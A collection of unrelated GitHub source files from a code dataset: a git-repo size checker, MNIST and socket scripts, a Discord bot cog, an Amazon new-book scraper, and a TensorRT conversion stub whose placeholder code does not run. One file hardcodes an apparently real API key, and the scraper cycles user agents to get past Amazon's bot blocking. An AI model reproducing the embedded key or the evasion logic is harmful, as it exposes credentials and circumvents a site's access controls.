return(ignore_files)\n\n\ndef _parse_git_attributes(attributes):\n \"\"\".. Get git lfs patterns from git attributes.\n\n Get git lfs patterns from file ``attributes``.\n\n Parameters\n ----------\n attributes : str\n Path of git attributes file.\n\n Returns\n -------\n lfs_list: list\n List of patterns to determine files tracked by git lfs. \n \"\"\"\n\n try:\n with open(attributes) as f:\n attributes_list = f.readlines()\n \n lfs_regex = 'filter=lfs( )+diff=lfs( )+merge=lfs( )+-text' \n lfs_list = [l for l in attributes_list if re.search(lfs_regex, l)]\n lfs_list = [l.split()[0] for l in lfs_list] \n\n return(lfs_list)\n except IOError:\n raise CritError(messages.crit_error_no_attributes)\n \n\ndef _check_path_lfs(path, lfs_list):\n \"\"\".. Check if file matches git lfs patterns.\"\"\"\n\n for l in lfs_list:\n if fnmatch.fnmatch(path, l):\n return(True)\n \n return(False)\n\n\ndef _get_dir_sizes(dir_path):\n \"\"\".. Get file sizes for directory.\n \n Get file sizes for files in directory ``dir_path``.\n\n Parameters\n ----------\n dir_path : str\n Path of directory to get file sizes.\n\n Returns\n -------\n git_files : dict\n Dictionary of ``{file : size}`` for each file tracked by git. \n git_lfs_files : dict\n Dictionary of ``{file : size}`` for each file tracked by git lfs. 
\n \"\"\"\n\n try:\n repo = git.Repo(dir_path, search_parent_directories = True) \n root = repo.working_tree_dir\n except:\n raise CritError(messages.crit_error_no_repo)\n\n git_files = _get_file_sizes(dir_path, exclude = ['.git'])\n git_ignore_files = _get_git_ignore(repo)\n\n for ignore in git_ignore_files: \n try:\n git_files.pop(ignore)\n except KeyError:\n pass\n \n lfs_list = _parse_git_attributes(os.path.join(root, '.gitattributes'))\n git_lfs_files = dict()\n \n for key in list(git_files.keys()):\n if _check_path_lfs(key, lfs_list): \n git_lfs_files[key] = git_files.pop(key)\n \n return(git_files, git_lfs_files)\n\n\ndef _get_size_values(git_files, git_lfs_files):\n \"\"\".. Get file sizes for repository.\n\n Get file sizes for files in dictionary ``git_files`` and dictionary ``git_lfs_files``.\n\n Parameters\n ----------\n git_files : dict\n Dictionary of ``{file : size}`` for each file tracked by git. \n git_lfs_files : dict\n Dictionary of ``{file : size}`` for each file tracked by git lfs. \n\n Returns\n -------\n file_MB : float\n Size of largest file tracked by git in megabytes.\n total_MB : float\n Total size of files tracked by git in megabytes.\n file_MB : float\n Size of largest file tracked by git lfs in megabytes.\n total_MB : float\n Total size of files tracked by git lfs in megabytes.\n \"\"\"\n\n file_MB = max(git_files.values() or [0])\n total_MB = sum(git_files.values() or [0]) \n file_MB_lfs = max(git_lfs_files.values() or [0]) \n total_MB_lfs = sum(git_lfs_files.values() or [0]) \n\n size_list = [file_MB, total_MB, file_MB_lfs, total_MB_lfs]\n size_list = [size / (1024 ** 2) for size in size_list]\n\n return(size_list)\n\n\ndef check_module_size(paths):\n \"\"\".. Check file sizes for module.\n\n Checks file sizes for files to be committed in the current working directory. \n Compares file sizes to size limits in file ``config`` and \n produces warnings if any of the following limits are exceeded.\n\n - Individual size of a file tracked by git lfs (``file_MB_limit_lfs``)\n - Total size of all files tracked by git lfs (``total_MB_limit_lfs``)\n - Individual size of a file tracked by git (``file_MB_limit``)\n - Total size of all files tracked by git (``total_MB_limit``)\n \n Warning messages are appended to file ``makelog``.\n\n Parameters\n ----------\n paths : dict \n Dictionary of paths. Dictionary should contain values for all keys listed below.\n\n Path Keys\n ---------\n config : str\n Path of project configuration file. 
\n makelog : str\n Path of makelog.\n\n Returns\n -------\n None\n \"\"\"\n \n try:\n git_files, git_lfs_files = _get_dir_sizes('.')\n file_MB, total_MB, file_MB_lfs, total_MB_lfs = _get_size_values(git_files, git_lfs_files)\n \n config = get_path(paths, 'config')\n config = open_yaml(config)\n max_file_sizes = config['max_file_sizes']\n \n print_message = ''\n if file_MB > max_file_sizes['file_MB_limit']:\n print_message = print_message + messages.warning_git_file_print % max_file_sizes['file_MB_limit']\n if total_MB > max_file_sizes['total_MB_limit']:\n print_message = print_message + messages.warning_git_repo % max_file_sizes['total_MB_limit']\n if file_MB_lfs > max_file_sizes['file_MB_limit_lfs']:\n print_message = print_message + messages.warning_git_lfs_file_print % max_file_sizes['file_MB_limit_lfs']\n if total_MB_lfs > max_file_sizes['total_MB_limit_lfs']:\n print_message = print_message + messages.warning_git_lfs_repo % max_file_sizes['total_MB_limit_lfs']\n print_message = print_message.strip()\n\n log_message = ''\n if file_MB > max_file_sizes['file_MB_limit']:\n log_message = log_message + messages.warning_git_file_log % max_file_sizes['file_MB_limit']\n exceed_files = [f for (f, s) in git_files.items() if s / (1024 ** 2) > max_file_sizes['file_MB_limit']]\n exceed_files = '\\n'.join(exceed_files)\n log_message = log_message + '\\n' + exceed_files\n if total_MB > max_file_sizes['total_MB_limit']:\n log_message = log_message + messages.warning_git_repo % max_file_sizes['total_MB_limit']\n if file_MB_lfs > max_file_sizes['file_MB_limit_lfs']:\n log_message = log_message + messages.warning_git_lfs_file_log % max_file_sizes['file_MB_limit_lfs']\n exceed_files = [f for (f, s) in git_lfs_files.items() if s / (1024 ** 2) > max_file_sizes['file_MB_limit_lfs']]\n exceed_files = '\\n'.join(exceed_files)\n log_message = log_message + '\\n' + exceed_files\n if total_MB_lfs > max_file_sizes['total_MB_limit_lfs']:\n log_message = log_message + messages.warning_git_lfs_repo % max_file_sizes['total_MB_limit_lfs']\n log_message = log_message.strip()\n\n if print_message:\n print(colored(print_message, metadata.color_failure))\n if log_message:\n write_to_makelog(paths, log_message)\n except:\n error_message = 'Error with `check_repo_size`. Traceback can be found below.' \n error_message = format_message(error_message) \n write_to_makelog(paths, error_message + '\\n\\n' + traceback.format_exc())\n raise ColoredError(error_message, traceback.format_exc())\n\n\ndef _get_git_status(repo): \n \"\"\".. Get git status.\n \n Get git status for repository ``repo``.\n\n Parameters\n ----------\n repo : :class:`git.Repo `\n Git repository to show working tree status.\n\n Returns\n -------\n file_list : list\n List of changed files in git repository according to git status.\n \"\"\"\n \n root = repo.working_tree_dir\n\n file_list = repo.git.status(porcelain = True)\n file_list = file_list.split('\\n')\n file_list = [f.lstrip().lstrip('MADRCU?!').lstrip() for f in file_list]\n file_list = [os.path.join(root, f) for f in file_list]\n file_list = [norm_path(f) for f in file_list]\n\n return(file_list)\n\n\ndef get_modified_sources(paths, \n source_map, \n depth = float('inf')):\n \"\"\".. Get source files considered changed by git.\n\n Checks the modification status for all sources contained in list \n ``source_map`` (returned by :ref:`sourcing functions`). \n Produces warning if sources have been modified according to git. \n When walking through sources, float ``depth`` determines level of depth to walk. 
\n Warning messages are appended to file ``makelog``.\n\n Parameters\n ----------\n paths : dict\n Dictionary of paths. Dictionary should contain values for all keys listed below.\n source_map : list\n Mapping of sources (returned from :ref:`sourcing functions`).\n depth : float, optional\n Level of depth when walking through source directories. Defaults to infinite.\n\n Path Keys\n ---------\n makelog : str\n Path of makelog.\n\n Returns\n -------\n overlap : list\n List of source files considered changed by git.\n\n Notes\n -----\n\n \"\"\"\n \n try:\n source_list = [source for source, destination in source_map]\n source_list = [glob_recursive(source, depth) for source in source_list]\n source_files = [f for source in source_list for f in source]\n source_files = set(source_files)\n \n try:\n repo = git.Repo('.', search_parent_directories = True) \n except:\n raise CritError(messages.crit_error_no_repo)\n modified = _get_git_status(repo)\n\n overlap = [l for l in source_files if l in modified] \n \n if overlap:\n if len(overlap) > 100:\n overlap = overlap[0:100]\n overlap = overlap + [\"and more (file list truncated due to length)\"]\n message = messages.warning_modified_files % '\\n'.join(overlap)\n write_to_makelog(paths, message)\n print(colored(message, metadata.color_failure))\n except:\n error_message = 'Error with `get_modified_sources`. Traceback can be found below.' \n error_message = format_message(error_message) \n write_to_makelog(paths, error_message + '\\n\\n' + traceback.format_exc())\n raise ColoredError(error_message, traceback.format_exc())\n\ndef check_conda_status(root):\n \"\"\".. Makes sure that the repository is being run with conda and is up to date.\n\n Checks that conda is activated. \n Produces warning if it is not. \n Produces warning if setup/conda_env.yaml has been altered more recently than the .\n\n Parameters\n ----------\n root : str \n Directory of root.\n\n Returns\n -------\n None \n\n Notes\n -----\n \"\"\"\n\n python_executable = sys.executable\n\n # Check if currently in a conda env\n if 'conda' in python_executable:\n try:\n conda_info = os.path.join(root, '.conda_info')\n conda_info_new = os.path.join(root, '.conda_info_new')\n\n if os.path.exists(conda_info):\n os.system('conda list --export > %s' % conda_info_new)\n if filecmp.cmp(conda_info, conda_info_new):\n os.system('rm %s' % conda_info_new)\n else:\n os.system('rm %s' % conda_info)\n os.system('mv %s %s' % (conda_info_new, conda_info))\n\n info_time = os.path.getmtime(conda_info)\n info_time = datetime.fromtimestamp(info_time)\n\n conda_yaml = os.path.join(root, 'setup', 'conda_env.yaml')\n yaml_time = os.path.getmtime(conda_yaml)\n yaml_time = datetime.fromtimestamp(yaml_time)\n\n if yaml_time > info_time:\n print(colored(messages.warning_old_conda, 'red'))\n else:\n os.system('conda list --export > %s' % conda_info)\n except:\n error_message = 'Error with `check_conda_status`. Traceback can be found below.' 
\n error_message = format_message(error_message) \n raise ColoredError(error_message, traceback.format_exc())\n else:\n print(colored(messages.warning_not_conda, 'red'))\n\n__all__ = ['check_module_size', 'get_modified_sources', 'check_conda_status']\n","repo_name":"gslab-econ/gslab_make","sub_path":"gslab_make/check_repo.py","file_name":"check_repo.py","file_ext":"py","file_size_in_byte":14471,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"71492839367","text":"import openai\n\nopenai.api_key = 'Zi1YPAX8zfVUxvvYRCGFx6o1A-Nmz4Ad_-_DpF-NKPddxPKJCftXOF10tjYhpe4mxaSf4Se99LUKJG1xn73lwGA'\nopenai.api_base = 'https://api.openai.iniad.org/api/v1'\n\nquestion = input('Question?\\n')\nresponse = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"user\", \"content\": question},\n ]\n)\n\nprint(response['choices'][0]['message']['content'])","repo_name":"S1F102100490/g5team3","sub_path":"chatgpt_example.py","file_name":"chatgpt_example.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1732228384","text":"def solution(clothes):\n Hash={}\n \n # [이름, 종류]\n for name, type in clothes:\n # get() : key로 value 얻기\n # Hash[type]로 종류 개수 가져왔음\n Hash[type] = Hash.get(type,0)+1\n \n # 모든 경우의 수\n answer = 1\n for type in Hash:\n answer*=(Hash[type]+1)\n \n # 안입을 경우\n return answer-1\n \n \n # answer = 0\n # return answer","repo_name":"leedahye2001/Algorithm","sub_path":"python/hash_04.py","file_name":"hash_04.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24525335349","text":"#!/usr/bin/env python3\n\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nimport argparse\nimport csv\nimport json\nimport logging\nimport lxml\nimport random\nimport re\nimport requests\nimport sys\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"-a\", \"--author\",\n dest=\"check_author\",\n help=\"Custom author check - [Default: all]\",\n default='all',\n action='store')\nparser.add_argument(\"-aL\", \"--author-list\",\n dest=\"author_list\",\n help=\"Custom filename for the csv file containing authors and urls - [Default: authors.csv]\",\n default='authors.csv',\n action='store')\nparser.add_argument(\"--author-file-folder\",\n dest=\"author_files_folder\",\n help=\"Custom authors file location - [Default: authors]\",\n default='authors',\n action='store')\nparser.add_argument(\"--log-level\",\n dest=\"log_level\",\n help=\"Set the level of logs to show (Options: DEBUG, INFO, WARNING, ERROR, CRITICAL) - [Default: WARNING]\",\n default='INFO',\n action='store')\nparser.add_argument(\"--test\",\n dest=\"test_run\",\n help=\"Set this to 'True' to run the script without sending the pushover message or saving the author files\",\n default=False,\n action='store')\nparser.add_argument(\"-Pu\", \"--pushover-user-token\",\n dest=\"user_token\",\n help=\"Pushover user token\",\n action='store')\nparser.add_argument(\"-Pa\", \"--pushover-api-token\",\n dest=\"api_token\",\n help=\"Pushover API token\",\n action='store')\n\nargs = parser.parse_args()\n\nif not args.test_run and not args.user_token and not args.api_token:\n parser.error(\"-Pu (--pushover-user-token) and -Pa (--pushover-api-token) are required when not doing a test run.\")\n\n\nlogging.basicConfig(format='%(asctime)s | %(levelname)s | %(message)s', 
level=args.log_level.upper())\n\ndef read_input_csv(author_list):\n logging.info(f\"Parsing the data from the author-list file: {author_list}\")\n with open(author_list, 'r') as file:\n reader = csv.DictReader(file)\n author_list = []\n for index, row in enumerate(reader):\n author_list.append(row)\n author_list[index]['url'] = \"https://www.amazon.com/s?k=\\\"{}\\\"&i=digital-text&s=date-desc-rank\".format(row['author'].replace(\" \",\"+\"))\n \n return author_list\n\ndef download_user_agent_list():\n ua_raw_url = \"https://gist.githubusercontent.com/pzb/b4b6f57144aea7827ae4/raw/cf847b76a142955b1410c8bcef3aabe221a63db1/user-agents.txt\"\n\n headers = ({'User-Agent':\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0 SeaMonkey/2.35',\n 'Accept-Language': 'en-US, en;q=0.5'})\n raw_html = requests.get(ua_raw_url, headers=headers).text\n user_agent_list = list(raw_html.split(\"\\n\"))\n random.shuffle(user_agent_list)\n\n return user_agent_list\n\n\ndef test_amazon_request(user_agent_list):\n test_url = 'https://www.amazon.com/s?k=\"Robin+Hobb\"&i=digital-text&s=date-desc-rank'\n \n\n for user_agent in user_agent_list:\n headers = ({'User-Agent':\n f'{user_agent}',\n 'Accept-Language': 'en-US, en;q=0.5'})\n raw_html = requests.get(test_url, headers=headers).text\n bad_ua = re.search('To discuss automated access to Amazon data please contact api-services-support@amazon.com.',str(raw_html))\n\n if bad_ua:\n logging.debug(\"Fail on user agent: {}\".format(user_agent))\n else:\n logging.info(\"Success on user agent string: {}\".format(user_agent))\n return headers\n\ndef download_html(author,author_url, headers):\n logging.info(\"Start looking for need books for author: {}\".format(author))\n logging.debug(f\"Downloading the HTML code from {author_url}\")\n raw_html = requests.get(author_url, headers=headers).text\n \n return raw_html\n\ndef parse_html(author, author_html):\n books = []\n\n soup = BeautifulSoup(author_html, 'lxml')\n books_div = soup.find_all('div', {\"class\": \"sg-col sg-col-4-of-12 sg-col-8-of-16 sg-col-12-of-20 sg-col-12-of-24 s-list-col-right\"})\n images_div = soup.find_all('div', {\"class\": \"sg-col sg-col-4-of-12 sg-col-4-of-16 sg-col-4-of-20 sg-col-4-of-24 s-list-col-left\"})\n\n for index, book_div in enumerate(books_div):\n try:\n book_data_raw = book_div.find_all(string=True)\n image_data_raw = images_div[index]\n contains_author = re.search(author,str(book_data_raw))\n contains_audiobook = re.search('Audible Audiobook',str(book_data_raw))\n\n date_pattern = r\"\\b(January|February|March|April|May|June|July|August|September|October|November|December)\\s+\\d{1,2},\\s+\\d{4}\\b\"\n contains_date = re.search(date_pattern, str(book_data_raw))\n contains_now_date = re.search(\"Available instantly\",str(book_data_raw))\n\n series_pattern = r\"Book (\\d{1,3} of \\d{1,3}): (.+?)\\'\\,\"\n contains_series = re.search(series_pattern, str(book_data_raw))\n\n cover_pattern = r\"src\\=\\\"(.+?)\\\" srcset\"\n cover_link = re.search(cover_pattern, str(image_data_raw))\n cover_render_pattern = r\"(W\\/IMAGE.+images\\/)\"\n\n if contains_author and (contains_now_date or contains_date) and not contains_audiobook:\n data = {}\n data['author'] = author\n data['title'] = book_data_raw[0]\n if contains_series:\n data['series'] = contains_series.group(2)\n data['bookInSeries'] = contains_series.group(1)\n else:\n data['series'] = \"\"\n data['bookInSeries'] = \"\"\n if cover_link:\n cover_url = cover_link.group(1)\n if cover_render_pattern:\n cover_url = 
re.sub(cover_render_pattern,'',cover_link.group(1))\n data['coverUrl'] = cover_url\n else:\n data['coverUrl'] = \"\"\n if contains_now_date:\n data['releaseDate'] = \"Available instantly\"\n elif contains_date:\n data['releaseDate'] = contains_date.group(0)\n else:\n data['releaseDate'] = \"\"\n\n books.append(data)\n except:\n continue\n return books\n\ndef read_author_file(author_file_location):\n try:\n with open(author_file_location, 'r', encoding='utf-8') as f:\n data = json.load(f)\n except:\n data = {}\n return data\n\ndef compare_books(author, new_books, known_books):\n new_or_updated_books = []\n\n # iterate over each book in new_books\n for book in new_books:\n # create a new dictionary that only contains the relevant keys for comparison\n new_book = {k: v for k, v in book.items() if k != 'lastUpdate'}\n \n # iterate over each book in known_books and create a new dictionary that only contains the relevant keys for comparison\n known_books_titles_and_series = []\n for known_book in known_books:\n known_book_titles_and_series = {k: v for k, v in known_book.items() if k != 'lastUpdate'}\n known_books_titles_and_series.append(known_book_titles_and_series)\n \n # check if the new_book is in known_books_titles_and_series\n if new_book not in known_books_titles_and_series:\n book['lastUpdate'] = datetime.today().strftime('%Y-%m-%d')\n new_or_updated_books.append(book)\n \n if new_or_updated_books:\n message = []\n for book in new_or_updated_books:\n book = book['title'] + \" - \" + book['releaseDate']\n message.append(book)\n message = \" \\n\".join(message)\n logging.info(\"Found new or updated books for author: {} \\nBooks: {}\\n\".format(author, message))\n else:\n logging.info(\"No new books or updates found for author: {}\".format(author))\n \n return new_or_updated_books\n\ndef update_author_file(author_file_location, new_or_updated_books, known_books):\n # create a new list that contains all known books and all new or updated books\n known_books_dict = {book['title']: book for book in known_books}\n\n # Loop over the new or updated books and update the known books dict accordingly\n for book in new_or_updated_books:\n # If the book already exists in the known_books_dict, update its values\n if book['title'] in known_books_dict:\n known_books_dict[book['title']].update(book)\n # Otherwise, add the book to the known_books_dict\n else:\n known_books_dict[book['title']] = book\n\n # Convert the known_books_dict back to a list of books and sort by title\n all_books = sorted(list(known_books_dict.values()), key=lambda x: x['title'])\n\n\n with open(author_file_location, 'w+', encoding='utf-8') as f:\n json.dump(all_books, f, ensure_ascii=False, indent=4)\n\ndef send_pushover_message(author, new_or_updated_books, user_token, api_token):\n message = []\n for book in new_or_updated_books:\n book = book['title'] + \" - \" + book['releaseDate']\n message.append(book)\n message = \" \\n\".join(message)\n\n payload = {\"title\": author, \"message\": message, \"user\": user_token, \"token\": api_token }\n logging.debug(payload)\n try:\n logging.info(\"Sending pushover message\")\n requests.post('https://api.pushover.net/1/messages.json', data=payload, headers={'User-Agent': 'Python'})\n except Exception as e:\n logging.error(\"Sening pushover message failed with error: {}\".format(e))\n\n\n\ndef check_author(author,author_url,author_file_location,user_agent_list,user_token, api_token):\n \n header = test_amazon_request(user_agent_list)\n author_html = download_html(author,author_url,header) # 
get raw html from author recent book page -- output: raw html\n new_books = parse_html(author,author_html) # get current books -- output: dict with current book data\n known_books = read_author_file(author_file_location) # get existing book -- output: dict with known books\n new_or_updated_books = compare_books(author, new_books, known_books) # compare new and known books -- output: dict of new or updates books\n if not args.test_run:\n if new_or_updated_books: # update author file with new books -- output author file with all books and up-to-date release date\n update_author_file(author_file_location, new_or_updated_books, known_books)\n send_pushover_message(author, new_or_updated_books, user_token, api_token)\n\ndef main():\n logging.info(\"Executing the script with the following arguments: {}\".format(sys.argv[1:]))\n author = args.check_author\n author_files_folder = args.author_files_folder\n author_list = read_input_csv(args.author_list)\n\n user_agent_list=download_user_agent_list()\n\n if author == \"all\":\n for row in author_list:\n author = row[\"author\"]\n author_url = row[\"url\"]\n author_file_location = \"{}/{}.json\".format(author_files_folder,author.replace(\" \",\"_\"))\n check_author(author,author_url,author_file_location,user_agent_list,args.user_token,args.api_token)\n else:\n for row in author_list:\n found_author = False\n if row[\"author\"] == author:\n found_author = True\n author_url = row[\"url\"]\n author_file_location = \"{}/{}.json\".format(author_files_folder,author.replace(\" \",\"_\"))\n check_author(author,author_url,author_file_location,user_agent_list,args.user_token,args.api_token)\n break\n if not found_author:\n logging.error(\"Author {} not found in author list.\".format(author))\n\n\nif __name__ == \"__main__\":\n try:\n main()\n except KeyboardInterrupt:\n print(\"\\nKeyboardInterrupt Detected.\")\n print(\"Exiting...\")\n exit(0)","repo_name":"jopbakker/amazonbooks_python","sub_path":"amazonbooks.py","file_name":"amazonbooks.py","file_ext":"py","file_size_in_byte":12330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10045969282","text":"#socket 모듈을 임포트\nfrom socket import *\nfrom select import select\nimport sys\nimport serial\nimport time\nimport json\n\nport='/dev/ttyUSB1' #메 뉴 > 도 구> 시리얼포 트\nbaudrate=9600\nse = serial.Serial(port,baudrate)\n\n# 호스트, 포트와 버퍼 사이즈를 지정\nHOST = '192.168.0.106'\nPORT = 56789\nBUFSIZE = 1024\nADDR = (HOST, PORT)\n\n# 소켓 객체를 만들고\nclientSocket = socket(AF_INET, SOCK_STREAM)\n\n# 서버와의 연결을 시도\ntry:\n clientSocket.connect(ADDR)\n \n\nexcept Exception as e:\n print('채팅 서버(%s:%s)에 연결 할 수 없습니다.' % ADDR)\n sys.exit()\nprint('채팅 서버(%s:%s)에 연결 되었습니다.' % ADDR)\n\n\n# 무한 루프를 시작\nwhile True:\n\ttime.sleep(1)\n\tnum = b'1'#b'1',b'2',b'3',b'4'\n\tclientSocket.send(num)\n\tdata=clientSocket.recv(BUFSIZE)\n\tprint(data.decode())\n\tse.write(data)\n\tled1 = json.loads(data.decode())[\"led1\"]\n\tled2 = json.loads(data.decode())[\"led2\"]\n\tprint(led1)\n\tprint(led2)\n\t\n\n\n","repo_name":"kyubeom21c/kosta_iot_study","sub_path":"pythonPro/test37socketClientSerial.py","file_name":"test37socketClientSerial.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32983510508","text":"#! 
/usr/bin/python3\n# iterate multiple time with different values of k between 2 and 10\n# each k value run 5 times\nimport sys\nimport kmean\n\nclass Args:\n def __init__(self, fn):\n self.filename = fn\n self.kval = 1\n self.summary = True\n\nif __name__ == \"__main__\":\n if (len(sys.argv) < 2):\n sys.exit('need file name')\n args = Args(sys.argv[1])\n for kval in range(2, 20):\n args.kval = kval\n for cnt in range(5):\n kmean.kmean(args)\n","repo_name":"PurdueCAM2Project/SE4ML","sub_path":"programs/unsupervised/kmean/solution/iterate.py","file_name":"iterate.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"} +{"seq_id":"30823445705","text":"import os\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nimport input_data\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n\ntr_images, tr_labels = mnist.train.next_batch(60000)\n\nTRAIN_SIZE = 50000\nSHOW_PROGRESS = False\nNUMBER = 0\n\nif len(sys.argv) > 1:\n if sys.argv[1] == 'progress':\n SHOW_PROGRESS = True\n\nfig0 = plt.figure()\n\nim0 = plt.imshow(np.asmatrix(tr_images[0].reshape(28, 28)), 'pink', animated=True)\n# plt.ion()\n\n\nfor i in range(0, len(tr_images)):\n tr_images[i] = np.array(tr_images[i]) / 255\n\nimg_shape = (28, 28)\n\n\ndef relu(x):\n return np.maximum(x, 0)\n\n\nw = (2 * np.random.rand(10, 784) - 1) / 10\nb = (2 * np.random.rand(10) - 1) / 10\n\nfor n in range(len(tr_images)):\n print('Training: {}'.format(n)) if n % 10000 == 0 else None\n\n img = tr_images[n]\n cls = tr_labels[n]\n\n # forward propagation\n resp = np.zeros(10, dtype=np.float32)\n for i in range(0, 10):\n r = w[i] * img\n r = relu(np.sum(r) + b[i])\n resp[i] = r\n\n resp_cls = np.argmax(resp)\n resp = np.zeros(10, dtype=np.float32)\n resp[resp_cls] = 1.0\n\n # back propagation\n\n if isinstance(cls, int):\n true_resp = np.zeros(10)\n true_resp[cls] = 1\n else:\n true_resp = cls\n\n error = resp - true_resp\n\n delta = error * ((resp >= 0) * np.ones(10))\n for i in range(0, 10):\n w[i] -= np.dot(img, delta[i])\n b[i] -= delta[i]\n\n if SHOW_PROGRESS:\n im0.set_array(np.asmatrix(w[0].reshape(28, 28)))\n plt.pause(0.000001)\n\n\nfor i in range(10):\n filename = 'train/{}'.format(i)\n if not os.path.exists(os.path.dirname(filename)):\n os.makedirs(os.path.dirname(filename))\n np.savetxt(filename, w[i])\n im0.set_array(np.asmatrix(w[i].reshape(28, 28)))\n filename = 'report/imgs/{}.png'.format(i)\n if not os.path.exists(os.path.dirname(filename)):\n os.makedirs(os.path.dirname(filename))\n plt.savefig(filename)\n\n\nfilename = 'train/b'\nnp.savetxt(filename, b)","repo_name":"SemenovaEkaterina/neural-network","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29256948604","text":"# -*- coding: utf-8 -*-\n#####################################################################################################\n# More Details https://tensorflow.google.cn/api_docs/python/tf/experimental/tensorrt/Converter?hl=en\n#####################################################################################################\nimport os\n\nimport cv2\nimport tensorflow as tf\nimport numpy as np\n\nfrom absl import app, flags, logging\nfrom tensorflow.python.saved_model import signature_constants\nfrom tensorflow.experimental import tensorrt as trt\n\nflags.DEFINE_string('weights', None, 'path to weights 
file')\nflags.DEFINE_string('output', None, 'path to output')\nflags.DEFINE_integer('input_size', 416, 'path to output')\nflags.DEFINE_string('quantize_mode', 'float16', 'quantize mode (int8, float16)')\nflags.DEFINE_string('dataset', \"./coco_dataset/coco/5k.txt\", 'path to dataset')\nflags.DEFINE_integer('loop', 10, 'loop')\n\nFLAGS = flags.FLAGS\n\nfrom tensorflow.python.compiler import tensorrt\n\ndef main(_argv):\n params = tf.experimental.tensorrt.ConversionParams(\n precision_mode='FP16',\n # Set this to a large enough number so it can cache all the engines.\n maximum_cached_engines=16)\n converter = trt.Converter(\n input_saved_model_dir=\"my_dir\", conversion_params=params)\n converter.convert()\n\n # Define a generator function that yields input data, and use it to execute\n # the graph to build TRT engines.\n # With TensorRT 5.1, different engines will be built (and saved later) for\n # different input shapes to the TRTEngineOp.\n def my_input_fn():\n for _ in range(num_runs):\n inp1, inp2 = ...\n yield inp1, inp2\n\n converter.build(input_fn=my_input_fn) # Generate corresponding TRT engines\n converter.save(output_saved_model_dir) # Generated engines will be saved.\n\n\n","repo_name":"bygreencn/yolox","sub_path":"convert_trt.py","file_name":"convert_trt.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"128401771","text":"# Solved on 2022. 3. 12.\n# 10799 쇠막대기\n\nimport sys\ninput = sys.stdin.readline\n\nstring = input().strip()\ncount, res = 0, 0\nlaser = False\nfor c in string:\n if c == '(':\n count += 1\n laser = True\n else:\n count -= 1\n if laser:\n res += count\n laser = False\n else:\n res += 1\nprint(res)\n","repo_name":"gemstoneyang/Algorithm","sub_path":"BOJ/Data_Structure/10799.py","file_name":"10799.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16908175230","text":"import discord\nfrom discord.ext import commands\nfrom datetime import datetime, timezone\nimport random as r\nfrom pytz import timezone #timezone()\nimport re\nimport requests\nfrom saucenao_api import SauceNao, VideoSauce, BookSauce\nfrom saucenao_api.errors import UnknownClientError\nimport tweepy\nfrom os import environ\n\n\n# Authenticate to Twitter\nauth = tweepy.OAuthHandler(environ.get('consumer_key'), environ.get('consumer_secret'))\nauth.set_access_token(environ.get('access_token'), environ.get('access_token_secret'))\n\n# Create API object\napi = tweepy.API(auth)\n\n# Replace the key with your own\nsauce = SauceNao(environ.get('SauceNao_key'))\nsauce2 = SauceNao(environ.get('SauceNao_key2'))\n\n\nclass Outros(commands.Cog, name=\"Diversos\"):\n \"\"\"Comandos diversos\"\"\"\n\n\n def __init__(self, client):\n self.client = client\n\n\n # !dm - sends dm to mentioned person\n @commands.command(usage=\" \", description=\"Send a DM to a member\")\n async def dm(self, ctx, member: discord.Member = None, *, message = None):\n if member and message:\n # Sending dm and deleting the message\n channel = await member.create_dm()\n await channel.send(\"**<@!{}>** from **{}:** {}\".format(ctx.message.author.id, ctx.guild.name, message))\n await ctx.message.delete()\n else:\n embed = discord.Embed(\n color = discord.Color(0xff0000),\n timestamp = datetime.utcnow(),\n description = \"**Sintaxe incorreta! 
Use !dm **\"\n )\n\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n await ctx.reply(embed=embed)\n\n # Checking if arguments are valid\n @dm.error\n async def dm_error(self, ctx, error):\n if isinstance(error, commands.BadArgument):\n embed = discord.Embed(\n color = discord.Color(0xff0000),\n timestamp = datetime.utcnow(),\n description = \"**Sintaxe incorreta! Use !dm **\"\n )\n\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n await ctx.reply(embed=embed)\n\n\n # !hello - hello\n @commands.command(description=\"Sup\")\n async def hello(self, ctx):\n await ctx.reply(\"Yo\")\n\n\n # !random - random number between 2 numbers\n @commands.command(usage=\", \", description=\"Pick a random number from `min` to `max`\")\n async def random(self, ctx, *, numero = None):\n # Verificando se somente um número inteiro foi fornecido, aceitando espaços em branco entre ele\n if numero and re.compile('^\\s*(-?\\d+)\\s*$').search(numero):\n m = re.compile('^\\s*(-?\\d+)\\s*$').search(numero)\n n1 = int(m.group(1))\n\n if n1 <= 0:\n random_number = r.randint(n1, 0)\n else:\n random_number = r.randint(0, n1)\n\n await ctx.reply(random_number)\n # Verificando se há dois números inteiros separados por uma vírgula, aceitando espaços em branco entre as palavras\n elif numero and 